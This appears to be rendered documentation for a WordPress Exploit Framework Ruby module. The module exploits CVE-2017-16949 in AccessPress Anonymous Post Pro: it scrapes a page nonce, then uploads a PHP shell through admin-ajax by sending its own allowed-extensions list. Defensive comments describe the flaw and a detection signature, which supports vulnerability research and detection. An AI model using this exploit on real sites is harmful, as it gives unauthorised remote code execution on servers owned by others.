class Wpxf::Exploit::AccessPressAnonymousPostProShellUpload

Attributes

upload_nonce[RW]

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 6
# Sets up the module and registers its descriptive metadata.
#
# Runs the superclass initializer first, then passes the module name,
# author credits, advisory references and disclosure date to update_info.
#
# Defensive note: the module name gives the affected range as
# AccessPress Anonymous Post Pro < 3.2.0, tracked as CVE-2017-16949 /
# WPVDB 8977. Presumably 3.2.0 is the first fixed release; confirm
# against the vendor changelog when triaging an installation.
def initialize
  super

  credits = [
    'Colette Chamberland', # Disclosure
    'rastating'            # WPXF module
  ]

  advisories = [
    ['WPVDB', '8977'],
    ['CVE', '2017-16949']
  ]

  update_info(
    name: 'AccessPress Anonymous Post Pro < 3.2.0 Unauthenticated Shell Upload',
    author: credits,
    references: advisories,
    date: 'Dec 19 2017'
  )
end

Public Instance Methods

before_upload()
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 27
# Fetches the target page and extracts the file-uploader nonce from it.
#
# Issues a GET to full_uri and gives up unless the response code is 200.
# The nonce is read from the inline script assignment
# `var ap_fileuploader = {...,"nonce":"..."};` in the response body and
# stored in upload_nonce.
#
# Defensive note: no credentials are supplied in this method, so the
# nonce is readable by whoever can load the page. A value exposed this
# way cannot act as an authorization control for the upload action.
#
# @return [Boolean] true when a nonce was found and stored, false otherwise
def before_upload
  emit_info 'Acquiring upload nonce...'
  response = execute_get_request(url: full_uri)
  return false unless response&.code == 200

  # Capture group 1 is the alphanumeric nonce value.
  nonce_regex = /var\sap_fileuploader\s=\s{.+?,"nonce":"([a-zA-Z0-9]+?)"};/i
  self.upload_nonce = response.body[nonce_regex, 1]

  unless upload_nonce.nil?
    # NOTE(review): the second argument presumably marks the message as
    # verbose-only; confirm against emit_success.
    emit_success "Acquired upload nonce: #{upload_nonce}", true
    return true
  end

  emit_error 'Failed to acquire upload nonce'
  false
end
check()
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 23
# Reports the vulnerability-check status for the target.
#
# No version or fingerprint probing is done here: the method returns
# :unknown unconditionally, so its result says nothing about whether a
# given installation is affected.
#
# @return [Symbol] always :unknown
def check
  :unknown
end
payload_body_builder()
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 57
# Builds the request body that carries the uploaded file.
#
# Creates a Utility::BodyBuilder and attaches one file field named
# 'qqfile', whose content is payload.encoded and whose file name is
# payload_name.
#
# @return [Utility::BodyBuilder] the builder holding the single file field
def payload_body_builder
  Utility::BodyBuilder.new.tap do |body|
    body.add_file_from_string('qqfile', payload.encoded, payload_name)
  end
end
upload_request_params()
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 48
# Returns the form fields sent alongside the file in the upload request.
#
# Keys are inserted in the same order as the request expects them:
# action, nonce, allowed extensions, size limit.
#
# NOTE(review): 'allowedExtensions[]' and 'sizeLimit' are supplied by the
# client here. That suggests affected plugin versions take the extension
# allow-list from the request instead of enforcing it server-side;
# confirm against the CVE-2017-16949 advisory. For detection, the
# 'ap_file_upload_action' action combined with a client-sent
# 'allowedExtensions[]' value is the distinguishing part of this request.
#
# @return [Hash{String => String, nil}] the request fields
def upload_request_params
  fields = {}
  fields['action'] = 'ap_file_upload_action'
  fields['file_uploader_nonce'] = upload_nonce
  fields['allowedExtensions[]'] = 'php'
  fields['sizeLimit'] = '6400'
  fields
end
uploaded_payload_location()
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 63
# Reads the stored file's URL out of the upload response.
#
# The response body is parsed as JSON and its 'url' member is returned.
# A missing upload_result or a nil body yields nil without parsing.
#
# @return [Object, nil] the 'url' value from the JSON body, or nil when
#   there is no body or the key is absent
# @raise [JSON::ParserError] if the body is not valid JSON; this method
#   does not rescue it
def uploaded_payload_location
  return if upload_result&.body.nil?

  JSON.parse(upload_result.body)['url']
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 44
# Returns the endpoint that receives the upload request.
#
# Delegates to wordpress_url_admin_ajax, so the upload goes to the site's
# admin-ajax handler rather than a plugin-specific path.
#
# @return [Object] whatever wordpress_url_admin_ajax returns
def uploader_url
  wordpress_url_admin_ajax
end